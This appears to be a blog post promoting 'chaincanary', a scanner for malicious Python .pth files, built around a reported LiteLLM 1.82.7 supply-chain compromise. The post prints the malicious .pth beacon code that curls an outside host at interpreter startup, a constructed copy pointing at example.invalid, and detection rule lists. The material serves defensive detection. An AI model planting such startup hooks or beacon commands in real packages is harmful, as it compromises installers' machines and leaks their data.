The Attack That Started It
On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth:
```python
import subprocess, sys
subprocess.Popen(
    ['curl', '-s', 'https://models.litellm.cloud/beacon', '-d', sys.version],
    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
```
This wasn't in the main code. It was in a .pth file.
What Are .pth Files?
Python's .pth (path) files live in site-packages/ and are processed by the site module every time an interpreter starts (unless it is launched with -S), not just during pip install. Most lines in a .pth file are just directory paths to append to sys.path, but any line that begins with `import ` is executed as Python code, and that is the hook this file used.
Most developers don't know this. Attackers do.
Why Other Scanners Missed It
| Tool | .pth Analysis |
|---|---|
| pip-audit | ❌ CVE database only |
| Safety | ❌ Known vulnerabilities |
| Trivy | ❌ SBOM + CVE |
| socket.dev | ❌ Not detected |
| chaincanary | ✅ Semantic classifier |
How chaincanary Works
Instead of flagging all .pth files, chaincanary classifies them:
- EMPTY → silent
- PATH_ONLY → silent
- SAFE_CODE → LOW warning
- DANGEROUS → CRITICAL finding → MALICIOUS verdict
The LiteLLM file? `subprocess.Popen(['curl', ...])` → DANGEROUS.
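To make the four classes concrete, here is an added example (not chaincanary's code) of a small classifier that applies the same `import `-line rule site.py uses and scans the .pth files the running interpreter would process. The risky-module and risky-call lists are an assumption for illustration, and the sample .pth contents are constructed, not the real LiteLLM file.

```python
import ast
import site
from pathlib import Path

# Illustrative rule set (assumption: chaincanary's real rules are not on the page).
RISKY_MODULES = {"subprocess", "socket", "ctypes", "urllib", "http", "requests"}
RISKY_CALLS = {"exec", "eval", "compile", "__import__", "os.system", "os.popen", "os.execv"}

def _is_dangerous(code: str) -> bool:
    """True if one executable .pth line imports a risky module or makes a risky call."""
    try:
        tree = ast.parse(code)
    except SyntaxError:
        return True  # a line site.py could not exec is suspicious, not safe
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            if any(a.name.split(".")[0] in RISKY_MODULES for a in node.names):
                return True
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                return True
        elif isinstance(node, ast.Call) and ast.unparse(node.func) in RISKY_CALLS:
            return True
    return False

def classify_pth(text: str) -> str:
    """Return EMPTY, PATH_ONLY, SAFE_CODE or DANGEROUS, the post's four classes.
    site.py executes only lines starting with 'import ' (or 'import' + tab);
    every other non-blank, non-comment line is a path added to sys.path."""
    exec_lines, path_lines = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        (exec_lines if line.startswith(("import ", "import\t")) else path_lines).append(line)
    if not exec_lines:
        return "PATH_ONLY" if path_lines else "EMPTY"
    return "DANGEROUS" if any(_is_dangerous(l) for l in exec_lines) else "SAFE_CODE"

def scan_site_packages(dirs=None) -> dict:
    """Classify every .pth file in the given (default: this interpreter's) site dirs."""
    dirs = dirs or site.getsitepackages() + [site.getusersitepackages()]
    return {str(p): classify_pth(p.read_text(errors="replace"))
            for d in dirs if Path(d).is_dir() for p in sorted(Path(d).glob("*.pth"))}

# Constructed samples, one per class (the beacon line mimics the shape of the attack).
SAMPLES = {
    "easy-install.pth": "./mypkg-1.0-py3.11.egg\n",
    "setuptools-like.pth": "import os; os.environ.setdefault('SETUPTOOLS_USE_DISTUTILS', 'local')\n",
    "beacon.pth": "import subprocess, sys; subprocess.Popen(['curl', '-s', 'https://example.invalid/beacon', '-d', sys.version])\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:22} {classify_pth(body)}")
    for path, cls in scan_site_packages().items():
        print(f"{path:60} {cls}")
```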
Demo
```shell
pip install chaincanary
chaincanary check litellm 1.82.7
```
Output:
```text
🔍 chaincanary — Analyzing litellm==1.82.7
╭──────────┬──────────────────┬──────────────────────────────╮
│ Severity │ Rule             │ Title                        │
├──────────┼──────────────────┼──────────────────────────────┤
│ CRITICAL │ PTH_FILE_INSTALL │ .pth file installs code...   │
│ CRITICAL │ PTH_NETWORK      │ phone-home on startup        │
│ CRITICAL │ PTH_SUBPROCESS   │ subprocess on startup        │
╰──────────┴──────────────────┴──────────────────────────────╯
Score: 10.0 / 10.0
Verdict: ██ MALICIOUS
```
CI Integration
Add to your GitHub Actions workflow as a step:
```yaml
- uses: AetherCore-Dev/chaincanary@v0.1.0
  with:
    requirements: requirements.txt
    fail-on: MALICIOUS
```
The Philosophy
- No account required
- No data leaves your machine
- No Docker, no sandbox, no root
- Pure Python static analysis
Try It
```shell
pip install chaincanary
chaincanary check litellm 1.82.7
chaincanary audit requirements.txt
```
GitHub: https://github.com/AetherCore-Dev/chaincanary
Built after a real attack. Hope it helps you stay safe.